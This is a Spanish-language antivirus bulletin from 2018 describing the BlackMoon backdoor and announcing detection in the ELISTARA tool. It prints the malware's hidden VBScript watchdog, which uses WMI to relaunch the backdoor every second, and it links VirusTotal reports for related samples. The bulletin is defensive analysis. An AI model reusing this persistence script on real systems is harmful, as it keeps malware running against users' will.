NUEVO BACKDOOR BLACKMOON QUE SE AUTOPROTEGE Y QUEDA RESIDENTE

Recibimos muestra, que pasaremos a controlar a partir del ELISTARA 39.29 de hoy, de un nuevo backdoor “BLACKMOON” que por sus caracteristicas lo consideramos atipico y pasamos a ofrecer información detallada de su comportamiento, viendo de entrada que se instala por varias vias en los ordenadores infectados, siendo el propiamente backdoor este EXE que queda residente, total ofrece el siguiente informe:

protegiendo al proceso EXE en cuestión mediante un VBS oculto en un AutoRunApp.vbs, con el siguiente contenido:

VBS “protector”
_____

option Explicit
dim wmi,proc,procs,proname,flag,WshShell
Do
proname=”%nombre%.exe”
set wmi=getobject(“winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2”)
set procs=wmi.execquery(“select * from win32_process”)
flag=true
for each proc in procs
if strcomp(proc.name,proname)=0 then
flag=false
exit for
end if
next
set wmi=nothing
if flag then
Set WshShell = Wscript.CreateObject(“Wscript.Shell”)
WshShell.Run (“%ruta%\ %nombre%.exe”)
end if
wscript.sleep 1000 ‘¼ì²â¼ä¸ôʱ¼ä£¬ÕâÀïÊÇ50Ãë
loop
_________

además de dejar tambien residente un proceso al que algunos antivirus detectan como TROJAN APOST:

INFORME DE VIRUSTOTAL SOBRE FICHERO AR292.EXE (“APOST”)
https://www.virustotal.com/es/file/1cd95d09e02c1a6c641fa9cffcdec7e93b238b9cafe705a5864edba7d2aa8093/analysis/1529399015/

Y creando tambien un KEYOSDK.EXE que tambien queda residente, al cual es parecido al EXE residente y tambien se detecta como BackDoor.BlackMoon, el cual ofrece el siguiente informe en VirusTotal:

https://www.virustotal.com/es/file/39516f2b3465d5dc801b7f0b3a6f7ca1b22a51611e61392a244d822887d182a6/analysis/1529399305/

Hemos procurado que a partir del ELISTARA 39.29 de hoy, nuestro ELISTARA los detecte y elimine de los ordenadores infectados, si bien cabe que aparezcan nuevas variantes con diferencias, que serán controlados en próximas versiones.

saludos

ms, 19-6-2018